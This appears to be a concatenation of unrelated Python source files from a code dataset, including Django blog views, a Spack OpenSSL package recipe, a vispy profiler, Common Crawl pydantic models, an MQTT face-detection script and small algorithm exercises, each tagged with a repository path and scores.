context.update({
'category': category,
})
return context
def get_queryset(self):
        '''Override queryset: filter posts by category.'''
queryset = super().get_queryset()
category_id = self.kwargs.get('category_id')
return queryset.filter(category_id=category_id)
class TagView(IndexView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
tag_id = self.kwargs.get('tag_id')
tag = get_object_or_404(Tag, pk=tag_id)
context.update({
'tag': tag,
})
return context
def get_queryset(self):
        '''Override queryset: filter posts by tag.'''
queryset = super().get_queryset()
tag_id = self.kwargs.get('tag_id')
return queryset.filter(tag__id=tag_id)
class PostDetailView(CommonViewMixin, DetailView):
queryset = Post.latest_posts()
template_name = 'blog/detail.html'
context_object_name = 'post'
pk_url_kwarg = 'post_id'
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
self.handle_visited()
return response
def handle_visited(self):
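        # Track page views (pv) and unique visits (uv) with short-lived cache keys:
        # repeat hits from the same uid are ignored for 1 minute (pv) and for the
        # same calendar day (uv).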
increase_pv = False
increase_uv = False
uid = self.request.uid
pv_key = 'pv:%s:%s' % (uid, self.request.path)
uv_key = 'uv:%s:%s:%s' % (uid, str(date.today()), self.request.path)
if not cache.get(pv_key):
increase_pv = True
            cache.set(pv_key, 1, 1*60)  # valid for 1 minute
if not cache.get(uv_key):
increase_uv = True
cache.set(uv_key, 1, 24*60*60)
if increase_pv and increase_uv:
Post.objects.filter(pk=self.object.id).update(pv=F('pv') + 1,
uv=F('uv') + 1)
elif increase_pv:
Post.objects.filter(pk=self.object.id).update(pv=F('pv') + 1)
        elif increase_uv:
            Post.objects.filter(pk=self.object.id).update(uv=F('uv') + 1)
class SearchView(IndexView):
def get_context_data(self):
context = super().get_context_data()
context.update({
'keyword': self.request.GET.get('keyword', '')
})
return context
def get_queryset(self):
queryset = super().get_queryset()
keyword = self.request.GET.get('keyword')
if not keyword:
return queryset
        return queryset.filter(
            Q(title__icontains=keyword) | Q(desc__icontains=keyword))
class AuthorView(IndexView):
def get_queryset(self):
queryset = super().get_queryset()
author_id = self.kwargs.get('owner_id')
return queryset.filter(owner_id=author_id)
'''
def post_list(request, category_id=None, tag_id=None):
tag = None
category = None
if tag_id:
post_list, tag = Post.get_by_tag(tag_id)
elif category_id:
post_list, category=Post.get_by_category(category_id)
else:
post_list = Post.latest_posts()
context = {
'category': category,
'tag': tag,
'post_list': post_list,
'sidebars': SideBar.get_all(),
}
context.update(Category.get_navs())
return render(request, 'blog/list.html', context=context)
def post_detail(request, post_id=None):
try:
post = Post.objects.get(id=post_id)
except Post.DoesNotExist:
raise Http404('Post does not exist!')
context={
'post': post,
'sidebars': SideBar.get_all(),
}
context.update(Category.get_navs())
return render(request, 'blog/detail.html', context=context)
'''
| 2 | 2 |
VMI/VMItest.py | thomasbarillot/DAQ | 1 | 1106 | <reponame>thomasbarillot/DAQ
# -*- coding: utf-8 -*-
"""
Created on Sat May 7 11:38:18 2016
@author: thomasbarillot
VMI control
"""
from ctypes import cdll
#slib="VMIcrtl_ext.dll"
#hlib=cdll('VMIcrtl.dll')
import VMIcrtl_ext
test=VMIcrtl_ext.VMIcrtl()
#%%
print test.GetFilename()
#%%
test.setFilename('20161115_1841.dat')
print test.GetFilename()
#%%
test.StartAcquisitionPrev()
#%%
test.StopAcquisition()
#%%
img=test.RecallImagePrev()
#%%
import numpy as np
print np.shape(img)
a=np.array(img)
print a
#%%
from matplotlib import pyplot as plt
#%%
b=np.reshape(a,[400,400])
print b
plt.figure()
plt.pcolor(np.reshape(a,[400,400])) | 1.851563 | 2 |
var/spack/repos/builtin/packages/openssl/package.py | vitodb/spack | 0 | 1107 | <filename>var/spack/repos/builtin/packages/openssl/package.py
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import llnl.util.tty as tty
from spack import *
import spack.architecture
import os
class Openssl(Package): # Uses Fake Autotools, should subclass Package
"""OpenSSL is an open source project that provides a robust,
commercial-grade, and full-featured toolkit for the Transport
Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
It is also a general-purpose cryptography library."""
homepage = "http://www.openssl.org"
# URL must remain http:// so Spack can bootstrap curl
url = "http://www.openssl.org/source/openssl-1.1.1d.tar.gz"
list_url = "http://www.openssl.org/source/old/"
list_depth = 1
# The latest stable version is the 1.1.1 series. This is also our Long Term
# Support (LTS) version, supported until 11th September 2023.
version('1.1.1g', sha256='ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46')
version('1.1.1f', sha256='186c6bfe6ecfba7a5b48c47f8a1673d0f3b0e5ba2e25602dd23b629975da3f35')
version('1.1.1e', sha256='694f61ac11cb51c9bf73f54e771ff6022b0327a43bbdfa1b2f19de1662a6dcbe')
version('1.1.1d', sha256='1e3a91bc1f9dfce01af26026f856e064eab4c8ee0a8f457b5ae30b40b8b711f2')
version('1.1.1c', sha256='f6fb3079ad15076154eda9413fed42877d668e7069d9b87396d0804fdb3f4c90')
version('1.1.1b', sha256='5c557b023230413dfb0756f3137a13e6d726838ccd1430888ad15bfb2b43ea4b')
version('1.1.1a', sha256='fc20130f8b7cbd2fb918b2f14e2f429e109c31ddd0fb38fc5d71d9ffed3f9f41')
version('1.1.1', sha256='2836875a0f89c03d0fdf483941512613a50cfb421d6fd94b9f41d7279d586a3d')
# The 1.1.0 series is out of support and should not be used.
version('1.1.0l', sha256='74a2f756c64fd7386a29184dc0344f4831192d61dc2481a93a4c5dd727f41148')
version('1.1.0k', sha256='efa4965f4f773574d6cbda1cf874dbbe455ab1c0d4f906115f867d30444470b1')
version('1.1.0j', sha256='31bec6c203ce1a8e93d5994f4ed304c63ccf07676118b6634edded12ad1b3246')
version('1.1.0i', sha256='ebbfc844a8c8cc0ea5dc10b86c9ce97f401837f3fa08c17b2cdadc118253cf99')
version('1.1.0g', sha256='de4d501267da39310905cb6dc8c6121f7a2cad45a7707f76df828fe1b85073af')
version('1.1.0e', sha256='57be8618979d80c910728cfc99369bf97b2a1abd8f366ab6ebdee8975ad3874c')
version('1.1.0d', sha256='7d5ebb9e89756545c156ff9c13cf2aa6214193b010a468a3bc789c3c28fe60df')
version('1.1.0c', sha256='fc436441a2e05752d31b4e46115eb89709a28aef96d4fe786abe92409b2fd6f5')
# The 1.0.2 series is out of support and should not be used.
version('1.0.2u', sha256='ecd0c6ffb493dd06707d38b14bb4d8c2288bb7033735606569d8f90f89669d16')
version('1.0.2t', sha256='14cb464efe7ac6b54799b34456bd69558a749a4931ecfd9cf9f71d7881cac7bc')
version('1.0.2s', sha256='cabd5c9492825ce5bd23f3c3aeed6a97f8142f606d893df216411f07d1abab96')
version('1.0.2r', sha256='ae51d08bba8a83958e894946f15303ff894d75c2b8bbd44a852b64e3fe11d0d6')
version('1.0.2p', sha256='50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00')
version('1.0.2o', sha256='ec3f5c9714ba0fd45cb4e087301eb1336c317e0d20b575a125050470e8089e4d')
version('1.0.2n', sha256='370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe')
version('1.0.2m', sha256='8c6ff15ec6b319b50788f42c7abc2890c08ba5a1cdcd3810eb9092deada37b0f')
version('1.0.2k', sha256='6b3977c61f2aedf0f96367dcfb5c6e578cf37e7b8d913b4ecb6643c3cb88d8c0')
version('1.0.2j', sha256='e7aff292be21c259c6af26469c7a9b3ba26e9abaaffd325e3dccc9785256c431')
version('1.0.2i', sha256='9287487d11c9545b6efb287cdb70535d4e9b284dd10d51441d9b9963d000de6f')
version('1.0.2h', sha256='1d4007e53aad94a5b2002fe045ee7bb0b3d98f1a47f8b2bc851dcd1c74332919')
version('1.0.2g', sha256='b784b1b3907ce39abf4098702dade6365522a253ad1552e267a9a0e89594aa33')
version('1.0.2f', sha256='932b4ee4def2b434f85435d9e3e19ca8ba99ce9a065a61524b429a9d5e9b2e9c')
version('1.0.2e', sha256='e23ccafdb75cfcde782da0151731aa2185195ac745eea3846133f2e05c0e0bff')
version('1.0.2d', sha256='671c36487785628a703374c652ad2cebea45fa920ae5681515df25d9f2c9a8c8')
# The 1.0.1 version is out of support and should not be used.
version('1.0.1u', sha256='4312b4ca1215b6f2c97007503d80db80d5157f76f8f7d3febbe6b4c56ff26739')
version('1.0.1t', sha256='4a6ee491a2fdb22e519c76fdc2a628bb3cec12762cd456861d207996c8a07088')
version('1.0.1r', sha256='784bd8d355ed01ce98b812f873f8b2313da61df7c7b5677fcf2e57b0863a3346')
version('1.0.1h', sha256='9d1c8a9836aa63e2c6adb684186cbd4371c9e9dcc01d6e3bb447abf2d4d3d093')
version('1.0.1e', sha256='f74f15e8c8ff11aa3d5bb5f276d202ec18d7246e95f961db76054199c69c1ae3')
variant('systemcerts', default=True, description='Use system certificates')
depends_on('zlib')
depends_on('[email protected]:', type=('build', 'test'))
parallel = False
@property
def libs(self):
return find_libraries(['libssl', 'libcrypto'], root=self.prefix.lib)
def handle_fetch_error(self, error):
tty.warn("Fetching OpenSSL failed. This may indicate that OpenSSL has "
"been updated, and the version in your instance of Spack is "
"insecure. Consider updating to the latest OpenSSL version.")
def install(self, spec, prefix):
# OpenSSL uses a variable APPS in its Makefile. If it happens to be set
# in the environment, then this will override what is set in the
# Makefile, leading to build errors.
env.pop('APPS', None)
if str(spec.target.family) in ('x86_64', 'ppc64'):
# This needs to be done for all 64-bit architectures (except Linux,
# where it happens automatically?)
env['KERNEL_BITS'] = '64'
options = ['zlib', 'shared']
if spec.satisfies('@1.0'):
options.append('no-krb5')
# clang does not support the .arch directive in assembly files.
if 'clang' in self.compiler.cc and \
'aarch64' in spack.architecture.sys_type():
options.append('no-asm')
config = Executable('./config')
config('--prefix=%s' % prefix,
'--openssldir=%s' % join_path(prefix, 'etc', 'openssl'),
'-I{0}'.format(self.spec['zlib'].prefix.include),
'-L{0}'.format(self.spec['zlib'].prefix.lib),
*options)
# Remove non-standard compiler options if present. These options are
# present e.g. on Darwin. They are non-standard, i.e. most compilers
# (e.g. gcc) will not accept them.
filter_file(r'-arch x86_64', '', 'Makefile')
make()
if self.run_tests:
make('test') # 'VERBOSE=1'
make('install')
@run_after('install')
def link_system_certs(self):
if '+systemcerts' not in self.spec:
return
system_dirs = [
# CentOS, Fedora, RHEL
'/etc/pki/tls',
# Ubuntu
'/usr/lib/ssl',
# OpenSUSE
'/etc/ssl'
]
pkg_dir = join_path(self.prefix, 'etc', 'openssl')
for directory in system_dirs:
sys_cert = join_path(directory, 'cert.pem')
pkg_cert = join_path(pkg_dir, 'cert.pem')
# If a bundle exists, use it. This is the preferred way on Fedora,
# where the certs directory does not work.
if os.path.exists(sys_cert) and not os.path.exists(pkg_cert):
os.symlink(sys_cert, pkg_cert)
sys_certs = join_path(directory, 'certs')
pkg_certs = join_path(pkg_dir, 'certs')
# If the certs directory exists, symlink it into the package.
# We symlink the whole directory instead of all files because
# the directory contents might change without Spack noticing.
if os.path.isdir(sys_certs) and not os.path.islink(pkg_certs):
os.rmdir(pkg_certs)
os.symlink(sys_certs, pkg_certs)
| 1.359375 | 1 |
vispy/util/profiler.py | izaid/vispy | 0 | 1108 | # -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
"""Simple profiler allowing directed, hierarchical measurement of time
intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `VISPYPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `VISPYPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "vispy.." prefix from the module.
"""
_profilers = (config['profile'].split(",") if config['profile'] is not None
else [])
_depth = 0
_msgs = []
# set this flag to disable all or individual profilers at runtime
disable = False
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabled_profiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if (disabled is True or
(disabled == 'env' and len(cls._profilers) == 0)):
return cls._disabled_profiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if (disabled == 'env' and func_qualname not in cls._profilers and
'all' not in cls._profilers): # don't do anything
return cls._disabled_profiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._mark_count = 0
obj._finished = False
obj._firstTime = obj._last_time = ptime.time()
obj._new_msg("> Entering " + obj._name)
return obj
def __call__(self, msg=None, *args):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._mark_count)
self._mark_count += 1
new_time = ptime.time()
elapsed = (new_time - self._last_time) * 1000
self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
self._last_time = new_time
def mark(self, msg=None):
self(msg)
def _new_msg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._new_msg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0] % m[1] for m in self._msgs]))
type(self)._msgs = []
| 2.859375 | 3 |
tests/test_processor.py | vijithv/djangosaml2idp | 1 | 1109 | from django.contrib.auth import get_user_model
from djangosaml2idp.processors import BaseProcessor
User = get_user_model()
class TestBaseProcessor:
def test_extract_user_id_configure_by_user_class(self):
user = User()
user.USERNAME_FIELD = 'email'
user.email = 'test_email'
assert BaseProcessor('entity-id').get_user_id(user) == 'test_email'
def test_extract_user_id_configure_by_settings(self, settings):
"""Should use `settings.SAML_IDP_DJANGO_USERNAME_FIELD` to determine the user id field"""
settings.SAML_IDP_DJANGO_USERNAME_FIELD = 'first_name'
user = User()
user.first_name = 'test_first_name'
assert BaseProcessor('entity-id').get_user_id(user) == 'test_first_name'
| 2.53125 | 3 |
com/ds/SingleLinkedList.py | sasikrishna/python-programs | 0 | 1110 |
class Node:
def __init__(self, data):
self.data = data
self.prev = None
self.next = None
class SingleLinkedList:
def __init__(self):
self.head = None
def add(self, ele):
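        # Append ele at the tail; walks the list from the head, so insertion is O(n).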
new_node = Node(ele)
if self.head is None:
self.head = new_node
return
temp_head = self.head
while temp_head.next is not None:
temp_head = temp_head.next;
temp_head.next = new_node;
def contains(self, ele):
temp_head = self.head
while temp_head is not None:
if temp_head.data == ele:
return True
temp_head = temp_head.next
return False
def remove(self, ele):
if self.head is None:
return;
if self.head.data == ele:
self.head = self.head.next
return True
        temp_head = self.head.next
        prev_node = self.head  # trailing pointer, so unlinking works for the 2nd node too
is_node_deleted = False
while temp_head is not None:
if temp_head.data == ele:
is_node_deleted = True
prev_node.next = temp_head.next
break
prev_node = temp_head
temp_head = temp_head.next
return is_node_deleted
def print_list(self):
temp_head = self.head
while temp_head is not None:
print(temp_head.data)
temp_head = temp_head.next
if __name__ == '__main__':
list = SingleLinkedList();
list.add(5)
list.add(4)
list.add(12)
list.add(13)
list.add(19)
list.print_list();
print("List contains element 4", list.contains(4))
print("List contains element 6", list.contains(6))
print("Removing element 13", list.remove(13))
list.print_list();
print("List contains element 13", list.contains(13))
| 3.75 | 4 |
src/data_setup/__init__.py | data-stories/chart-experiment | 0 | 1111 | __all__ = ["data_setup", "chart_params", "base_params"] | 1.09375 | 1 |
src/aiocomcrawl/models.py | rudaporto/aiocomcrawl | 0 | 1112 | from datetime import datetime
from typing import Any, List, Optional, Union
from pydantic import BaseModel, Field, HttpUrl, validator
from pydantic.dataclasses import dataclass
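# Pydantic models describing Common Crawl index endpoints, CDX search requests and
# the records (plus fetched WARC body/metadata) returned by the index API.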
class Index(BaseModel):
id: str
name: str
time_gate: HttpUrl = Field(alias="timegate")
cdx_api: HttpUrl = Field(alias="cdx-api")
@dataclass(frozen=True)
class ResultBody:
mime_detected: Optional[str]
data: Optional[str]
text: Optional[List[str]]
@dataclass(frozen=True)
class ResultMeta:
# todo: these are still raw strings
warc_request_meta: Optional[str]
response_header: Optional[str]
class Result(BaseModel):
url_key: str = Field(alias="urlkey")
timestamp: datetime
url: str
mime: str
mime_detected: str = Field(alias="mime-detected")
status: int
digest: str
length: int
offset: int
filename: str
languages: Optional[str]
encoding: Optional[str]
index_id: Optional[str]
body: Optional[ResultBody]
meta: Optional[ResultMeta]
@validator("timestamp", pre=True)
def parse_timestamp(cls, value: Any) -> Union[datetime, Any]:
if isinstance(value, str):
datetime_value = datetime.strptime(value, "%Y%m%d%H%M%S")
return datetime_value
return value
class SearchPagesRequest(BaseModel):
"""Request existing pages on one index for a given url."""
index: Index
url: str
show_num_pages: str = Field(alias="showNumPages", default="true", const=True)
output: str = "json"
class SearchPagesResponse(BaseModel):
"""Response with the total number of pages in this index for a given url."""
index: Index
url: str
pages: int
class SearchIndexRequest(BaseModel):
"""One page that contains records to be fetched."""
index: Index
url: str
page: int
output: str = "json"
| 2.5 | 2 |
fs/error_tools.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 0 | 1113 | <gh_stars>0
"""Tools for managing OS errors.
"""
from __future__ import print_function
from __future__ import unicode_literals
import errno
from contextlib import contextmanager
import sys
import platform
from . import errors
from six import reraise
_WINDOWS_PLATFORM = platform.system() == 'Windows'
class _ConvertOSErrors(object):
"""Context manager to convert OSErrors in to FS Errors.
"""
FILE_ERRORS = {
64: errors.RemoteConnectionError, # ENONET
errno.EACCES: errors.PermissionDenied,
errno.ENOENT: errors.ResourceNotFound,
errno.EFAULT: errors.ResourceNotFound,
errno.ESRCH: errors.ResourceNotFound,
errno.ENOTEMPTY: errors.DirectoryNotEmpty,
errno.EEXIST: errors.FileExists,
183: errors.DirectoryExists,
#errno.ENOTDIR: errors.DirectoryExpected,
errno.ENOTDIR: errors.ResourceNotFound,
errno.EISDIR: errors.FileExpected,
errno.EINVAL: errors.FileExpected,
errno.ENOSPC: errors.InsufficientStorage,
errno.EPERM: errors.PermissionDenied,
errno.ENETDOWN: errors.RemoteConnectionError,
errno.ECONNRESET: errors.RemoteConnectionError,
errno.ENAMETOOLONG: errors.PathError,
errno.EOPNOTSUPP: errors.Unsupported,
errno.ENOSYS: errors.Unsupported,
}
DIR_ERRORS = FILE_ERRORS.copy()
DIR_ERRORS[errno.ENOTDIR] = errors.DirectoryExpected
DIR_ERRORS[errno.EEXIST] = errors.DirectoryExists
DIR_ERRORS[errno.EINVAL] = errors.DirectoryExpected
if _WINDOWS_PLATFORM: # pragma: no cover
DIR_ERRORS[13] = errors.DirectoryExpected
DIR_ERRORS[267] = errors.DirectoryExpected
FILE_ERRORS[13] = errors.FileExpected
def __init__(self, opname, path, directory=False):
self._opname = opname
self._path = path
self._directory = directory
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
os_errors = (
self.DIR_ERRORS
if self._directory
else self.FILE_ERRORS
)
if exc_type and isinstance(exc_value, EnvironmentError):
_errno = exc_value.errno
fserror = os_errors.get(_errno, errors.OperationFailed)
if _errno == errno.EACCES and sys.platform == "win32":
if getattr(exc_value, 'args', None) == 32: # pragma: no cover
fserror = errors.ResourceLocked
reraise(
fserror,
fserror(
self._path,
exc=exc_value
),
traceback
)
# Stops linter complaining about invalid class name
convert_os_errors = _ConvertOSErrors
@contextmanager
def unwrap_errors(path_replace):
"""Get a context to map OS errors to their `fs.errors` counterpart.
The context will re-write the paths in resource exceptions to be
in the same context as the wrapped filesystem.
The only parameter may be the path from the parent, if only one path
is to be unwrapped. Or it may be a dictionary that maps wrapped
paths on to unwrapped paths.
"""
try:
yield
except errors.ResourceError as e:
if hasattr(e, 'path'):
if isinstance(path_replace, dict):
e.path = path_replace.get(e.path, e.path)
else:
e.path = path_replace
reraise(type(e), e)
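# Illustrative sketch (filesystem object and paths are hypothetical): re-map the path
# reported in a raised ResourceError back to the caller's view of the filesystem.
#
#     with unwrap_errors({'/backend/data.txt': '/data.txt'}):
#         inner_fs.getinfo('/backend/data.txt')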
| 2.171875 | 2 |
samples/samplenetconf/demos/vr_demo3.py | gaberger/pysdn | 1 | 1114 | <gh_stars>1-10
#!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: <NAME>
@status: Development
@version: 1.1.0
"""
import time
import json
from pysdn.controller.controller import Controller
from pysdn.netconfdev.vrouter.vrouter5600 import VRouter5600
from pysdn.common.status import STATUS
from pysdn.common.utils import load_dict_from_file
def vr_demo_3():
f = "cfg4.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
nodeIpAddr = d['nodeIpAddr']
nodePortNum = d['nodePortNum']
nodeUname = d['nodeUname']
nodePswd = d['nodePswd']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("\n")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
vrouter = VRouter5600(ctrl, nodeName, nodeIpAddr, nodePortNum,
nodeUname, nodePswd)
print ("<<< 'Controller': %s, '%s': %s"
% (ctrlIpAddr, nodeName, nodeIpAddr))
print ("\n")
time.sleep(rundelay)
node_configured = False
result = ctrl.check_node_config_status(nodeName)
status = result.get_status()
if(status.eq(STATUS.NODE_CONFIGURED)):
node_configured = True
print ("<<< '%s' is configured on the Controller" % nodeName)
elif(status.eq(STATUS.DATA_NOT_FOUND)):
node_configured = False
else:
print ("\n")
print "Failed to get configuration status for the '%s'" % nodeName
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
if node_configured is False:
result = ctrl.add_netconf_node(vrouter)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< '%s' added to the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n")
time.sleep(rundelay)
result = ctrl.check_node_conn_status(nodeName)
status = result.get_status()
if(status.eq(STATUS.NODE_CONNECTED)):
print ("<<< '%s' is connected to the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief().lower())
exit(0)
print("\n")
print ("<<< Show configuration of the '%s'" % nodeName)
time.sleep(rundelay)
result = vrouter.get_cfg()
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("'%s' configuration:" % nodeName)
cfg = result.get_data()
data = json.loads(cfg)
print json.dumps(data, indent=4)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief().lower())
exit(0)
print "\n"
print (">>> Remove '%s' NETCONF node from the Controller" % nodeName)
time.sleep(rundelay)
result = ctrl.delete_netconf_node(vrouter)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("'%s' NETCONF node was successfully removed "
"from the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief())
exit(0)
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
vr_demo_3()
| 1.585938 | 2 |
python/index.py | stijnvanhulle/EscapeGame | 1 | 1115 | <gh_stars>1-10
# @Author: <NAME> <stijnvanhulle>
# @Date: 2016-11-28T13:51:38+01:00
# @Email: <EMAIL>
# @Last modified by: stijnvanhulle
# @Last modified time: 2016-12-20T12:51:07+01:00
# @License: stijnvanhulle.be
#!/usr/bin/env python
import time
import datetime
import math
import sys
import json
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
import lib.faceDetection as faceDetection
import lib.levelCalculation as levelCalculation
MQTT_BROKER="localhost"
client = mqtt.Client()
#classes
def on_connect(client, userdata, rc):
print("Connected to MQTT-broker on " + MQTT_BROKER )
client.subscribe("online")
client.subscribe("message")
client.subscribe("detection_find")
client.subscribe("detection_found")
client.subscribe("recalculate_start")
client.subscribe("recalculate_done")
def on_message(client, userdata, msg):
try:
parsed_json=json.loads(convertJson(msg.payload))
if msg.topic=="detection_find":
print(parsed_json)
_image1 =parsed_json['image1']
_image2 =parsed_json['image2']
_read=parsed_json['read']
if _read:
if _image1 is not None and _image2 is not None:
percent=faceDetection.getDifference(_image1,_image2)
print('Detection:' + str(percent))
client.publish("detection_found", makeJsonObject_detection(percent,_image1,_image2,_read))
if msg.topic=="recalculate_start":
print(parsed_json)
_data =parsed_json['data']
_file=parsed_json['file']
if _data is not None:
calcObj=levelCalculation.calculate(_data,_file)
print('CalculatedOBJ:' + str(calcObj))
client.publish("recalculate_done", makeJsonObject_levelCalculate(calcObj['data'],calcObj['score']))
except Exception as error:
print('Error:',error)
def convertJson(data):
data=data.decode()
if data.startswith("'") and data.endswith("'"):
data = data[1:-1]
print(data)
return data
def makeJsonOnlineObject(device=''):
item=json.dumps({"device":device})
return str(item)
def init():
client.on_connect = on_connect
client.on_message = on_message
client.connect_async(MQTT_BROKER, 1883, 60)
client.loop_start()
time.sleep(0.2)
client.publish("online", makeJsonOnlineObject('FaceDetection'))
def makeJsonObject(value=None,port=None,type=None,read=False):
item=json.dumps({"port":port, "type":type,"value":value,"read":read})
return str(item)
def makeJsonObject_detection(value=None,image1=None,image2=None,read=False):
item=json.dumps({"value":value, "image1":image1,"image2":image2, "read":read})
return str(item)
def makeJsonObject_levelCalculate(data=None,score=0):
item=json.dumps({"data":data,"score":score})
return str(item)
def main():
init()
while True:
time.sleep(0.1)
data = input("Code:")
if data is not None:
try:
if data=='exit':
exit()
sys.exit(0)
else:
                    parsed_json = json.loads(data)
_type =parsed_json['type']
_port=parsed_json['port']
_read=parsed_json['read']
if _type is not None and _port is not None and _read is not None:
item=str(json.dumps(parsed_json))
print(item)
#client.publish("message",item)
client.publish("detection",item)
else:
                        raise Exception('Not correct data')
except Exception as error:
print('Error:',error)
if __name__ == '__main__':
try:
if len(sys.argv)>1:
MQTT_BROKER=sys.argv[1]
else:
input_text = input("Ip of MQTT-broker: ")
if input_text:
MQTT_BROKER=input_text
#executor = ProcessPoolExecutor(2)
#loop = trollius.get_event_loop()
#_main = trollius.async(loop.run_in_executor(executor, main))
main()
except (TypeError) as ex:
error="Error: " + str(ex)
#print(error)
except (KeyboardInterrupt):
exit()
print("\nIOT is afgesloten\n")
sys.exit(0)
except (SystemExit):
print("\nIOT is geforceert afgelosten\n")
| 2.21875 | 2 |
Codility/python/tape_equilibrium.py | ajeet1308/code_problems | 61 | 1116 | def solution(A):
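    # Codility TapeEquilibrium: minimize |sum(A[:P]) - sum(A[P:])| over all split
    # points P; e.g. solution([3, 1, 2, 4, 3]) == 1 (split after the third element).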
total = sum(A)
m = float('inf')
left_sum = 0
for n in A[:-1]:
left_sum += n
v = abs(total - 2*left_sum)
if v < m:
m = v
return m
| 3.234375 | 3 |
